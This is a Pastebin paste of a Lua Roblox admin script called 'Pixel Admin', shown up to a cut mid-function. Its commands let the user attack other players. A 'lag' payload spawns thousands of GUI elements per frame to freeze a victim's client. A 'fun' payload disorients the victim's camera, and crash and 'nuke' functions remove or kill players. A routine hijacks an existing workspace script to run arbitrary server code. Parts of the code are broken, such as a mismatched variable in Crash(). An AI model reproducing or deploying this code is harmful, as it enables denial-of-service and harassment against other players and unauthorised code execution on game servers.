Advertisement
Pixenova

Pixel Admin

Aug 4th, 2015
310
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 60.18 KB | None | 0 0
  1. wait()
  2. LocalPlayer=Game:GetService("Players").LocalPlayer
  3. script["Parent"]=(_PixelTabs_)
  4. Tabs={}
  5. Cmds={}
  6. key=(";")
  7. chatgui=false
  8. probemode=false
  9. Safe=("Pixenova")
  10. connection=nil
  11. Updates=("Glitch Fixes")
  12.  
  13.  
  14.  
  15. tabmodel=Instance.new("Model",workspace)
  16. tabmodel.Name=("Tablets")
  17. SourceName=("DSource")
  18. Banlist={"Paej"}
  19. function Crash(Player)
  20.     player=tostring(Player or ("nil"))
  21.     local value=Instance.new("StringValue")
  22.     Value["Name"]=("DISC: "..Player)
  23.     Value["Parent"]=Game["Lighting"]
  24.     Game["Debris"]:Additem(Value,1)
  25. end
  26.  
  27. LagSource = [==[
  28. wait(0)
  29. script.Parent = nil
  30. plr = game:GetService("Players").LocalPlayer
  31. local plrgui = plr:findFirstChild("PlayerGui")
  32. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  33. while plr.Parent == game:GetService("Players") do
  34. wait()
  35. for i = 1, 1000 do
  36. local sc = Instance.new("ScreenGui",plrgui)
  37. local fr = Instance.new("TextLabel",sc)
  38. fr.Text = "GTFO YOU SKID"
  39. fr.Size = UDim2.new(1, 0, 1, 0)
  40. fr.FontSize = "Size50"
  41. end
  42. end
  43. ]==]
  44.  
  45. Doge = [[
  46. do --CFrame lerp
  47.         local function QuaternionFromCFrame(cf)
  48.                 local mx, my, mz, m00, m01, m02, m10, m11, m12, m20, m21, m22 = cf:components()
  49.                 local trace = m00 + m11 + m22
  50.                 if trace > 0 then
  51.                         local s = math.sqrt(1 + trace)
  52.                         local recip = 0.5/s
  53.                         return (m21-m12)*recip, (m02-m20)*recip, (m10-m01)*recip, s*0.5
  54.                 else
  55.                         local i = 0
  56.                         if m11 > m00 then
  57.                                 i = 1
  58.                         end
  59.                         if m22 > (i == 0 and m00 or m11) then
  60.                                 i = 2
  61.                         end
  62.                         if i == 0 then
  63.                                 local s = math.sqrt(m00-m11-m22+1)
  64.                                 local recip = 0.5/s
  65.                                 return 0.5*s, (m10+m01)*recip, (m20+m02)*recip, (m21-m12)*recip
  66.                         elseif i == 1 then
  67.                                 local s = math.sqrt(m11-m22-m00+1)
  68.                                 local recip = 0.5/s
  69.                                 return (m01+m10)*recip, 0.5*s, (m21+m12)*recip, (m02-m20)*recip
  70.                         elseif i == 2 then
  71.                                 local s = math.sqrt(m22-m00-m11+1)
  72.                                 local recip = 0.5/s return (m02+m20)*recip, (m12+m21)*recip, 0.5*s, (m10-m01)*recip
  73.                         end
  74.                 end
  75.         end
  76.         local function QuaternionToCFrame(px, py, pz, x, y, z, w)
  77.                 local xs, ys, zs = x + x, y + y, z + z
  78.                 local wx, wy, wz = w*xs, w*ys, w*zs
  79.                 local xx = x*xs
  80.                 local xy = x*ys
  81.                 local xz = x*zs
  82.                 local yy = y*ys
  83.                 local yz = y*zs
  84.                 local zz = z*zs
  85.                 return CFrame.new(px, py, pz,1-(yy+zz), xy - wz, xz + wy,xy + wz, 1-(xx+zz), yz - wx, xz - wy, yz + wx, 1-(xx+yy))
  86.                 end  
  87.         local function QuaternionSlerp(a, b, t)
  88.                 local cosTheta = a[1]*b[1] + a[2]*b[2] + a[3]*b[3] + a[4]*b[4]
  89.                 local startInterp, finishInterp;
  90.                 if cosTheta >= 0.0001 then
  91.                         if (1 - cosTheta) > 0.0001 then
  92.                                 local theta = math.acos(cosTheta)
  93.                                 local invSinTheta = 1/math.sin(theta)
  94.                                 startInterp = math.sin((1-t)*theta)*invSinTheta
  95.                                 finishInterp = math.sin(t*theta)*invSinTheta  
  96.                         else
  97.                                 startInterp = 1-t
  98.                                 finishInterp = t
  99.                         end
  100.                 else
  101.                         if (1+cosTheta) > 0.0001 then
  102.                                 local theta = math.acos(-cosTheta)
  103.                                 local invSinTheta = 1/math.sin(theta)
  104.                                 startInterp = math.sin((t-1)*theta)*invSinTheta
  105.                                 finishInterp = math.sin(t*theta)*invSinTheta
  106.                         else
  107.                                 startInterp = t-1
  108.                                 finishInterp = t
  109.                         end
  110.                 end
  111.                 return a[1]*startInterp + b[1]*finishInterp, a[2]*startInterp + b[2]*finishInterp, a[3]*startInterp + b[3]*finishInterp, a[4]*startInterp + b[4]*finishInterp
  112.         end  
  113.         function clerp(a,b,t)
  114.                 local qa = {QuaternionFromCFrame(a)}
  115.                 local qb = {QuaternionFromCFrame(b)}
  116.                 local ax, ay, az = a.x, a.y, a.z
  117.                 local bx, by, bz = b.x, b.y, b.z  
  118.                 local _t = 1-t
  119.                 return QuaternionToCFrame(_t*ax + t*bx, _t*ay + t*by, _t*az + t*bz,QuaternionSlerp(qa, qb, t))
  120.         end
  121.  
  122. end
  123. do --the animating
  124. plr = game:service'Players'.LocalPlayer
  125. char = plr.Character
  126. mouse = plr:GetMouse()
  127. humanoid = char:findFirstChild("Humanoid")
  128. torso = char:findFirstChild("Torso")
  129. head = char.Head
  130. ra = char:findFirstChild("Right Arm")
  131. la = char:findFirstChild("Left Arm")
  132. rl = char:findFirstChild("Right Leg")
  133. ll = char:findFirstChild("Left Leg")
  134. rs = torso:findFirstChild("Right Shoulder")
  135. ls = torso:findFirstChild("Left Shoulder")
  136. rh = torso:findFirstChild("Right Hip")
  137. lh = torso:findFirstChild("Left Hip")
  138. neck = torso:findFirstChild("Neck")
  139. rj = char:findFirstChild("HumanoidRootPart"):findFirstChild("RootJoint")
  140. anim = char:findFirstChild("Animate")
  141. rootpart = char:findFirstChild("HumanoidRootPart")
  142. camera = workspace.CurrentCamera
  143. if anim then
  144. anim:Destroy()
  145. end
  146.  
  147.  
  148. local rm = Instance.new("Motor", torso)
  149. rm.C0 = CFrame.new(1.5, 0.5, 0)
  150. rm.C1 = CFrame.new(0, 0.5, 0)
  151. rm.Part0 = torso
  152. rm.Part1 = ra
  153. local lm = Instance.new("Motor", torso)
  154. lm.C0 = CFrame.new(-1.5, 0.5, 0)
  155. lm.C1 = CFrame.new(0, 0.5, 0)
  156. lm.Part0 = torso
  157. lm.Part1 = la
  158.  
  159. local rlegm = Instance.new("Motor", torso)
  160. rlegm.C0 = CFrame.new(0.5, -1, 0)
  161. rlegm.C1 = CFrame.new(0, 1, 0)
  162. rlegm.Part0 = torso
  163. rlegm.Part1 = rl
  164. local llegm = Instance.new("Motor", torso)
  165. llegm.C0 = CFrame.new(-0.5, -1, 0)
  166. llegm.C1 = CFrame.new(0, 1, 0)
  167. llegm.Part0 = torso
  168. llegm.Part1 = ll
  169.  
  170. neck.C0 = CFrame.new(0, 1, 0)
  171. neck.C1 = CFrame.new(0, -0.5, 0)
  172.  
  173.  
  174. rj.C0 = CFrame.new()
  175. rj.C1 = CFrame.new()
  176.  
  177.  
  178. local sound = Instance.new("Sound", head)
  179. sound.SoundId = "http://www.roblox.com/asset/?id=130797915"
  180. sound.Volume = 0.8
  181. sound.Looped = true
  182.  
  183. for i,v in pairs(char:children()) do
  184.     if v:IsA("Hat") then
  185.         v:Destroy()
  186.     end
  187. end
  188.  
  189.  
  190. --look of the fox here
  191. game:service'InsertService':LoadAsset(151784320):children()[1].Parent = char
  192. Instance.new("PointLight", head).Range = 10
  193.  
  194.  
  195.  
  196.  
  197. local speed = 0.3
  198. local angle = 0
  199. local sitting = false
  200. local humanwalk = false
  201. local anglespeed = 1
  202. rsc0 = rm.C0
  203. lsc0 = lm.C0
  204. llc0 = llegm.C0
  205. rlc0 = rlegm.C0
  206. neckc0 = neck.C0
  207.  
  208. local controllerService = game:GetService("ControllerService")
  209. local controller = controllerService:GetChildren()[1]
  210.  
  211. controller.Parent = nil
  212.  
  213. Instance.new("HumanoidController", game:service'ControllerService')
  214. Instance.new("SkateboardController", game:service'ControllerService')
  215. Instance.new("VehicleController", game:service'ControllerService')
  216. local controller = controllerService:GetChildren()[1]
  217. mouse.KeyDown:connect(function(k)
  218.     if k == "q" then
  219.         humanwalk = not humanwalk
  220.     end
  221.     if k == "z" then
  222.         if not sound.IsPlaying then
  223.             sound:stop()
  224.             sound.SoundId = "http://www.roblox.com/asset/?id=130802245"
  225.             wait()
  226.             sound:play()
  227.         end
  228.     end
  229.     if k == "x" then
  230.         if not sound.IsPlaying then
  231.             sound:stop()
  232.             sound.SoundId = "http://www.roblox.com/asset/?id=150794704"
  233.             wait()
  234.             sound:play()
  235.         end
  236.     end
  237.     if k == "c" then
  238.         if not sound.IsPlaying then
  239.             sound:stop()
  240.             sound.SoundId = "http://www.roblox.com/asset/?id=149713968"
  241.             wait()
  242.             sound:play()
  243.         end
  244.     end
  245.     if string.byte(k) == 48 then
  246.         humanoid.WalkSpeed = 55
  247.     end
  248.    
  249. end)
  250. mouse.KeyUp:connect(function(k)
  251.    
  252.     if string.byte(k) == 48 then
  253.         humanoid.WalkSpeed = 14
  254.     end
  255.    
  256. end)
  257.  
  258.    
  259.  
  260. while wait() do
  261.     angle = (angle % 100) + anglespeed/10
  262.         mvmnt = math.pi * math.sin(math.pi*2/100*(angle*10))
  263.         local rscf = rsc0
  264.         local lscf = lsc0
  265.         local rlcf = rlc0
  266.         local llcf = llc0
  267.         local rjcf = CFrame.new()
  268.         local ncf = neckc0
  269.         local rayz = Ray.new(rootpart.Position, Vector3.new(0, -6, 0))
  270.             local hitz, enz = workspace:findPartOnRay(rayz, char)
  271.             if not hitz then
  272.         if sound.IsPlaying then
  273.             sound:stop()
  274.         end
  275.        
  276.         if Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude > 2 then
  277.        
  278.         ncf = neckc0 * CFrame.Angles(math.pi/5, 0, 0)
  279.         rjcf = CFrame.new() * CFrame.Angles(-math.pi/5, math.sin(angle)*0.05, 0)
  280.         rscf = rsc0 * CFrame.Angles(math.pi/1.7+math.sin(angle)*0.1, 0, 0)
  281.         lscf = lsc0 * CFrame.Angles(math.pi/1.7+math.sin(-angle)*0.1, 0, 0)
  282.         rlcf = rlc0 * CFrame.Angles(-math.pi/10+math.sin(-angle)*0.3, 0, 0)
  283.         llcf = llc0 * CFrame.Angles(-math.pi/10+math.sin(angle)*0.3, 0, 0)
  284.        
  285.         else
  286.        
  287.         ncf = neckc0 * CFrame.Angles(math.pi/14, 0, 0)
  288.         rjcf = CFrame.new() * CFrame.Angles(-math.pi/18, math.sin(angle)*0.05, 0)
  289.         rscf = rsc0 * CFrame.Angles(-math.pi/10+math.sin(angle)*0.2, 0, 0)
  290.         lscf = lsc0 * CFrame.Angles(-math.pi/10+math.sin(-angle)*0.2, 0, 0)
  291.         rlcf = rlc0 * CFrame.new(0, 0.7, -0.5) CFrame.Angles(-math.pi/14, 0, 0)
  292.         llcf = llc0 * CFrame.Angles(-math.pi/20, 0, 0)
  293.        
  294.         end
  295.     elseif humanoid.Sit then
  296.         if sound.IsPlaying and sound.SoundId == "http://www.roblox.com/asset/?id=150794704" then
  297.         anglespeed = 6
  298.         ncf = neckc0 * CFrame.Angles(math.pi/5-math.sin(angle)*0.1, 0, 0)
  299.         rjcf = CFrame.new(0, -0.8, 0) * CFrame.Angles(-math.pi/5, 0, 0)
  300.         rscf = rsc0 * CFrame.new(-.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, -math.rad(15))
  301.         lscf = lsc0 * CFrame.new(.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, math.rad(15))
  302.         rlcf = rlc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, math.rad(20))
  303.         llcf = llc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, -math.rad(20))
  304.         elseif sound.IsPlaying and sound.SoundId == "http://www.roblox.com/asset/?id=135570347" then
  305.         anglespeed = 4
  306.         ncf = neckc0 * CFrame.Angles(math.pi/5-math.abs(math.sin(angle))*0.3, 0, 0)
  307.         rjcf = CFrame.new(0, -0.8, 0) * CFrame.Angles(-math.pi/5, 0, 0)
  308.         rscf = rsc0 * CFrame.new(-.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, -math.rad(15))
  309.         lscf = lsc0 * CFrame.new(.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, math.rad(15))
  310.         rlcf = rlc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, math.rad(20))
  311.         llcf = llc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, -math.rad(20))
  312.         elseif sound.IsPlaying and sound.SoundId == "http://www.roblox.com/asset/?id=149713968" then
  313.         anglespeed = 2
  314.         ncf = neckc0 * CFrame.Angles(math.pi/5, 0, math.sin(angle)*0.08)
  315.         rjcf = CFrame.new(0, -0.8, 0) * CFrame.Angles(-math.pi/5, math.sin(angle)*0.01, 0)
  316.         rscf = rsc0 * CFrame.new(-.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, -math.rad(15))
  317.         lscf = lsc0 * CFrame.new(.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, math.rad(15))
  318.         rlcf = rlc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, math.rad(20))
  319.         llcf = llc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, -math.rad(20))
  320.         else
  321.         anglespeed = 1/2
  322.         ncf = neckc0 * CFrame.Angles(math.pi/5, 0, math.sin(angle)*0.08)
  323.         rjcf = CFrame.new(0, -0.8, 0) * CFrame.Angles(-math.pi/5, math.sin(angle)*0.01, 0)
  324.         rscf = rsc0 * CFrame.new(-.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, -math.rad(15))
  325.         lscf = lsc0 * CFrame.new(.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, math.rad(15))
  326.         rlcf = rlc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, math.rad(20))
  327.         llcf = llc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, -math.rad(20))
  328.         end
  329.     elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude < 2 then
  330.         if sound.IsPlaying and sound.SoundId == "http://www.roblox.com/asset/?id=130797915" then
  331.         anglespeed = 6
  332.             ncf = neckc0 * CFrame.Angles(math.pi/10-math.sin(angle)*0.07, 0, 0)
  333.             rjcf = CFrame.new(0, 0, 0) * CFrame.Angles(-math.pi/10, math.sin(angle)*0.001, 0)
  334.             rscf = rsc0 * CFrame.Angles(math.pi/1+math.sin(angle)*0.5, 0, 0)
  335.             lscf = lsc0 * CFrame.Angles(math.pi/1+math.sin(angle)*0.5, 0, 0)
  336.             rlcf = rlc0 * CFrame.Angles(math.pi/10, math.sin(angle)*0.08, math.rad(6.5))
  337.             llcf = llc0 * CFrame.Angles(math.pi/10, -math.sin(angle)*0.08, -math.rad(6.5))
  338.         elseif sound.IsPlaying and sound.SoundId == "http://www.roblox.com/asset/?id=149713968" then
  339.             anglespeed = 2
  340.             ncf = neckc0 * CFrame.Angles(math.pi/10-math.abs(math.sin(angle))*0.3, 0, 0)
  341.             rjcf = CFrame.new(0, 0, 0) * CFrame.Angles(-math.pi/20, math.sin(angle)*0.001, 0)
  342.             rscf = rsc0 * CFrame.Angles(math.pi/2+math.abs(math.sin(angle)*1), 0, 0)
  343.             lscf = lsc0 * CFrame.Angles(math.pi/2+math.abs(math.sin(angle)*1), 0, 0)
  344.             rlcf = rlc0 * CFrame.Angles(math.pi/20, math.sin(angle)*0.08, math.rad(2.5))
  345.             llcf = llc0 * CFrame.Angles(math.pi/20, -math.sin(angle)*0.08, -math.rad(2.5))
  346.         elseif sound.IsPlaying and sound.SoundId == "http://www.roblox.com/asset/?id=130802245" then
  347.         anglespeed = 3
  348.         ncf = neckc0 * CFrame.Angles(math.sin(angle)*0.07, math.rad(30), 0)
  349.         rjcf = CFrame.new(0, 0, 0) * CFrame.Angles(0, math.sin(angle)*0.001, 0)
  350.         rscf = rsc0 * CFrame.Angles(math.sin(angle)*0.05, 0, 0)
  351.         lscf = lsc0 * CFrame.Angles(math.sin(-angle)*0.05, 0, 0)
  352.         rlcf = rlc0 * CFrame.new(0, -0.1 + math.abs(mvmnt)*0.1, -0.1) * CFrame.Angles(0, math.rad(5), math.rad(5))
  353.         llcf = llc0 * CFrame.Angles(0, math.rad(2.5), math.rad(1))
  354.         else
  355.             if humanwalk then
  356.                         anglespeed = 1/4
  357.         ncf = neckc0 * CFrame.Angles(-math.sin(angle)*0.07, 0, 0)
  358.         rjcf = CFrame.new(0, 0, 0) * CFrame.Angles(0, math.sin(angle)*0.001, 0)
  359.         rscf = rsc0 * CFrame.Angles(math.sin(angle)*0.1, 0, 0)
  360.         lscf = lsc0 * CFrame.Angles(math.sin(-angle)*0.1, 0, 0)
  361.         rlcf = rlc0 * CFrame.Angles(0, math.sin(angle)*0.08, math.rad(2.5))
  362.         llcf = llc0 * CFrame.Angles(0, -math.sin(angle)*0.08, -math.rad(2.5))
  363.                 else
  364.         anglespeed = 1/2
  365.         ncf = neckc0 * CFrame.Angles(math.pi/5, 0, math.sin(angle)*0.08)
  366.         rjcf = CFrame.new(0, -2, 0) * CFrame.Angles(-math.pi/5, math.sin(angle)*0.01, 0)
  367.         rscf = rsc0 * CFrame.new(-.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, -math.rad(15))
  368.         lscf = lsc0 * CFrame.new(.45, 0.2, -.3) * CFrame.Angles(math.pi/3, 0, math.rad(15))
  369.         rlcf = rlc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, math.rad(20))
  370.         llcf = llc0 * CFrame.Angles(math.pi/2+math.pi/5, 0, -math.rad(20))
  371.             end
  372.         end
  373.     elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude < 20 then
  374.         if sound.IsPlaying then
  375.             sound:stop()
  376.         end
  377.         if humanwalk then
  378.                                 anglespeed = 4
  379.         ncf = neckc0 * CFrame.Angles(math.pi/24, mvmnt*.02, 0)
  380.         rjcf = CFrame.new(0, math.abs(mvmnt)*0.05, 0) * CFrame.Angles(-math.pi/24, -mvmnt*.02, 0)
  381.         rscf = rsc0 * CFrame.Angles(math.sin(angle)*1.25, 0, -math.abs(mvmnt)*0.02)
  382.         lscf = lsc0 * CFrame.Angles(math.sin(-angle)*1.25, 0, math.abs(mvmnt)*0.02)
  383.         rlcf = rlc0 * CFrame.Angles(math.sin(-angle)*1, 0, math.rad(.5))
  384.         llcf = llc0 * CFrame.Angles(math.sin(angle)*1, 0, -math.rad(.5))
  385.                 else
  386.         anglespeed = 4
  387.         ncf = neckc0 * CFrame.new(0, 0, .2) * CFrame.Angles(math.pi/1.9, 0, 0)
  388.         rjcf = CFrame.new(0, -1.5+math.abs(mvmnt)*0.05, 0) * CFrame.Angles(-math.pi/1.9, math.sin(mvmnt/2)*0.05, 0)
  389.         rscf = rsc0 * CFrame.new(-.45, 0.2, -.4+math.abs(mvmnt)*0.125) * CFrame.Angles(math.pi/2+math.sin(angle)*0.7, 0, math.rad(5))
  390.         lscf = lsc0 * CFrame.new(.45, 0.2, .1-math.abs(mvmnt)*0.125) * CFrame.Angles(math.pi/2+math.sin(-angle)*0.7, 0, -math.rad(5))
  391.         rlcf = rlc0 * CFrame.new(0, 0, -.3+math.abs(mvmnt)*0.125) * CFrame.Angles(math.pi/2.5+math.sin(-angle)*0.6, 0, math.abs(mvmnt)*0.025)
  392.         llcf = llc0 * CFrame.new(0, 0, .3-math.abs(mvmnt)*0.125) * CFrame.Angles(math.pi/2.5+math.sin(angle)*.6, 0, -math.abs(mvmnt)*0.025)
  393.         end
  394.     elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude >= 20 then
  395.         if sound.IsPlaying then
  396.             sound:stop()
  397.         end
  398.         if humanwalk then
  399.         anglespeed = 5
  400.         ncf = neckc0 * CFrame.Angles(math.pi/20, math.sin(angle)*.04, 0)
  401.         rjcf = CFrame.new(0, -.4 + math.abs(mvmnt)*0.25, 0) * CFrame.Angles(-math.pi/20, -math.sin(angle)*.08, 0)
  402.         rscf = rsc0 * CFrame.new(0, 0, -.3+math.abs(mvmnt)*0.125) *  CFrame.Angles(math.pi/18+math.sin(angle)*1.5, 0, -math.abs(mvmnt)*0.02)
  403.         lscf = lsc0 * CFrame.new(0, 0, .3-math.abs(mvmnt)*0.125) * CFrame.Angles(math.pi/18+math.sin(-angle)*1.5, 0, math.abs(mvmnt)*0.02)
  404.         rlcf = rlc0 * CFrame.new(0, 0, -.6+math.abs(mvmnt)*0.125) * CFrame.Angles(-math.pi/18+math.sin(-angle)*1.3, 0, math.rad(.5))
  405.         llcf = llc0 * CFrame.new(0, 0, -math.abs(mvmnt)*0.125) * CFrame.Angles(-math.pi/18+math.sin(angle)*1.3, 0, -math.rad(.5))
  406.         else
  407.         anglespeed = 5.5
  408.         ncf = neckc0 * CFrame.new(0, 0, .2) * CFrame.Angles(math.pi/1.9+math.sin(mvmnt/2)*0.05, 0, 0)
  409.         rjcf = CFrame.new(0, -1.3+math.abs(mvmnt)*0.05, 0) * CFrame.Angles(-math.pi/1.9+math.abs(mvmnt/2)*0.1, 0, 0)
  410.         rscf = rsc0 * CFrame.new(-1, 0.2, -.5) * CFrame.Angles(math.pi/2+math.sin(angle)*1.8, 0, math.rad(5))
  411.         lscf = lsc0 * CFrame.new(1, 0.2, -.5) * CFrame.Angles(math.pi/2+math.sin(angle)*1.8, 0, -math.rad(5))
  412.         rlcf = rlc0 * CFrame.new(0, .3-math.abs(mvmnt)*0.125, -.3+math.abs(mvmnt)*0.125) * CFrame.Angles(math.pi/2.5+math.sin(-angle)*1.4, 0, math.abs(mvmnt)*0.025)
  413.         llcf = llc0 * CFrame.new(0, .3-math.abs(mvmnt)*0.125, .3-math.abs(mvmnt)*0.125) * CFrame.Angles(math.pi/2.5+math.sin(-angle)*1.4, 0, -math.abs(mvmnt)*0.025)
  414.         end
  415.     end
  416.        
  417.     rm.C0 = clerp(rm.C0,rscf,speed)
  418.     lm.C0 = clerp(lm.C0,lscf,speed)
  419.     rj.C0 = clerp(rj.C0,rjcf,speed)
  420.     neck.C0 = clerp(neck.C0,ncf,speed)
  421.     rlegm.C0 = clerp(rlegm.C0,rlcf,speed)
  422.     llegm.C0 = clerp(llegm.C0,llcf,speed)
  423. end
  424.  
  425.  
  426. end]]
  427.  
  428. FunScript = [[
  429. LP = game:service'Players'.LocalPlayer
  430. Shapes = {"Ball", "Block"}
  431. wait()
  432. script.Parent = nil
  433. Delay(0, function()
  434. while wait() do
  435. workspace.CurrentCamera.CameraType = "Scriptable"
  436. workspace.CurrentCamera.FieldOfView = workspace.CurrentCamera.FieldOfView + math.random(-5,5)
  437. workspace.CurrentCamera:SetRoll(workspace.CurrentCamera:GetRoll()+0.075)
  438. workspace.CurrentCamera.CoordinateFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  439. local Part = Instance.new("Part", workspace.CurrentCamera)
  440. Part.Shape = Shapes[math.random(1, 2)]
  441. Part.Anchored = true
  442. Part.BrickColor = BrickColor.new(math.random(),math.random(),math.random())
  443. Part.Size = Vector3.new(math.random(5,10),math.random(-25,25),math.random(5,10))
  444. Part.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-250,250),math.random(-100,100),math.random(-250,250)) * CFrame.Angles(math.random(),math.random(),math.random())
  445. local Smoke = Instance.new("Smoke", Part)
  446. Smoke.Color = Color3.new(math.random(), math.random(), math.random())
  447. Smoke.Opacity = 0.7
  448. local Sparkles = Instance.new("Sparkles", Part)
  449. Sparkles.SparkleColor = Color3.new(math.random(), math.random(), math.random())
  450. local Fire = Instance.new("Fire", Part)
  451. Fire.Color = Color3.new(math.random(), math.random(), math.random())
  452. Fire.SecondaryColor = Color3.new(math.random(), math.random(), math.random())
  453. local Ex = Instance.new("Explosion", workspace.CurrentCamera)
  454. Ex.Position = Vector3.new(math.random(-250,250),math.random(10,100),math.random(-250,250))
  455. Ex.BlastPressure = 15
  456. Ex.BlastRadius = 12.5
  457. if not workspace.CurrentCamera:findFirstChild("Hint") then
  458. local mes = Instance.new("Hint", workspace.CurrentCamera)
  459. mes.Text = "OMG STOP EATING"
  460. end
  461. end
  462. end)
  463. ]]
  464. Playerlist={}
  465.  
  466. function NilCrash(Name)
  467.     local Crasher=Instance.new("StringValue")
  468.     Crasher.Name=("Client")
  469.     Crasher.Value=string.lower(tostring(Name))
  470.     Crasher.Parent=Game["Lighting"]
  471.     wait(1)
  472.     if Crasher~=nil and Crasher.Parent~=nil then
  473.         ypcall(function()
  474.         Crasher:Destroy()
  475.         end)
  476.     end
  477. end
  478. --[[ReName Players if needed.]]--
  479. coroutine.resume(coroutine.create(function()
  480.     while wait(3) do
  481.         if Game:GetService("Players").Name~=("Players") then
  482.             Game:GetService("Players").Name=("Players")
  483.         end
  484.     end
  485. end))
  486.  
  487.  
  488.  
  489.  
  490. function Dismiss()
  491.     for _=1,10 do
  492.         for _=1,#Tabs do
  493.             table.remove(Tabs,_)
  494.             if tabmodel~=nil then
  495.                 tabmodel:ClearAllChildren()
  496.             end
  497.         end
  498.     end
  499. end
  500.  
  501. function AddCmd(Name,Say,Desc,Func)
  502.     table.insert(Cmds,{["Name"]=Name,["Say"]=Say,["Desc"]=Desc,["Func"]=Func})
  503. end
  504.  
  505.  
  506. AddCmd("Banlist","bl","Show the Current Banned Players.",
  507. function()
  508.     Dismiss()
  509.     for _,BannedPlr in pairs(Banlist) do
  510.         Output(BannedPlr)
  511.     end
  512. end)
  513.  
  514. AddCmd("Fun","fun","Make the Selected Player have Fun.",
  515. function(Plrs)
  516.     for _,Plr in pairs(Plrs) do
  517.         if Plr~=nil and Plr["Backpack"]~=nil then
  518.             NewLS(FunScript,Plr["Backpack"])
  519.         end
  520.     end
  521. end)
  522.  
  523. AddCmd("Lag player","lag","Lag the Selected Player.",
  524. function(Plrs)
  525.     for _,Plr in pairs(Plrs) do
  526.         if Plr~=nil and Plr["Backpack"]~=nil then
  527.             NewLS(LagSource,Plr["Backpack"])
  528.         end
  529.     end
  530. end)
  531.  
  532. AddCmd("give u Doge","dg","Makes your self Doge",
  533.             function(plrs)
  534.                     for _, plr in pairs(plrs) do
  535.                             if plr and plr.Backpack then
  536.                                     NewLS(Doge, plr.Backpack)
  537.                                            
  538.                             end
  539.                             end
  540.                     end
  541.    )
  542.  
  543. AddCmd("Nuke","nuke","Nuke the Selected Player.",
  544. function(Plrs)
  545.     for _,Plr in pairs(Plrs) do
  546.         if Plr~=nil and Plr["Character"] then
  547.             Explosion=Instance.new("Explosion",Plr["Character"])
  548.             Explosion["Position"]=Plr["Character"].Torso
  549.         end
  550.     end
  551. end)
  552.  
  553. AddCmd("Fire","fire","Give the Selected Player Fire.",
  554. function(Plrs)
  555.     for _,Plr in pairs(Plrs) do
  556.         if Plr~=nil and Plr["Character"]~=nil and Plr["Character"].Torso~=nil then
  557.             Instance.new("Fire",Plr["Character"].Torso)
  558.         end
  559.     end
  560. end)
  561.  
  562. AddCmd("Un-fire","unfire","Removes Fire from a Selected Player.",
  563. function(Plrs)
  564.     for _,Plr in pairs(Plrs) do
  565.         if Plr~=nil and Plr["Character"]~=nil and Plr["Character"].Torso~=nil then
  566.             pcall(function()
  567.                 for _,Child in pairs(Plr["Character"].Torso:GetChildren()) do
  568.                     if Child:IsA("Fire") then
  569.                         Child:Destroy()
  570.                     end
  571.                 end
  572.             end)
  573.         end
  574.     end
  575. end)
  576. found=false
  577. coroutine.wrap(function()
  578. while found==false do
  579. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  580. for _,scriptinworkspace in pairs(workspace:children()) do
  581. if scriptinworkspace then
  582. if scriptinworkspace:IsA("Script") then
  583. if scriptinworkspace:FindFirstChild(SourceName) then
  584. newScript = scriptinworkspace:Clone()
  585. wait(0.2)
  586. newScript.Name = "NewScript"
  587. newScript.Disabled = true
  588. newScript:FindFirstChild(SourceName).Value = ""
  589. Output("Source found",__)
  590. found = true
  591. break
  592. end
  593. end
  594. end
  595. end
  596. wait();
  597. end
  598. end)()
  599.  
  600. AddCmd("Unpunish player","unpunish","Restore the player's character",
  601. function(plrs)
  602. for _, plr in pairs(plrs) do
  603. if plr then
  604. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  605. end
  606. end
  607. end
  608. )
  609.  
  610. function NewS(sourcevalue, parent)
  611. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  612. NS(sourcevalue, parent)
  613. else
  614. if newScript then
  615. local scr = newScript:Clone()
  616. if scr:FindFirstChild(SourceName) then
  617. if scr:FindFirstChild(SourceName) then
  618. scr:FindFirstChild(SourceName).Value = sourcevalue
  619. scr.Parent = parent
  620. wait(0.5)
  621. scr.Disabled = false
  622. return scr
  623. end
  624. end
  625. end
  626. end
  627. end
  628.  
  629. sorcery = script:Clone()
  630.  
  631. Services = {
  632. game:GetService("Workspace"),
  633. game:GetService("Players"),
  634. game:GetService("Lighting"),
  635. game:GetService("StarterPack"),
  636. game:GetService("StarterGui"),
  637. game:GetService("Teams"),
  638. game:GetService("SoundService"),
  639. game:GetService("Debris"),
  640. game:GetService("InsertService"),
  641. game:GetService("RunService"),
  642. game:GetService("Chat"),
  643. game:GetService("TeleportService"),
  644. game:GetService("Geometry"),
  645. game:GetService("MarketplaceService"),
  646. game:GetService("BadgeService"),
  647. game:GetService("NetworkClient"),
  648. game:GetService("FriendService"),
  649. }
  650.  
  651. function Explore(Item)
  652. Dismiss()
  653. if(Item==nil)then
  654. for _,v in pairs(Services)do
  655. Output(tostring(v),function() wait() Explore(v) end)
  656. end;
  657. else
  658. f={
  659. ['View children']=function()
  660. Dismiss()
  661. for _,v in pairs(Item:children())do
  662. Output(v.Name,function()
  663. wait()
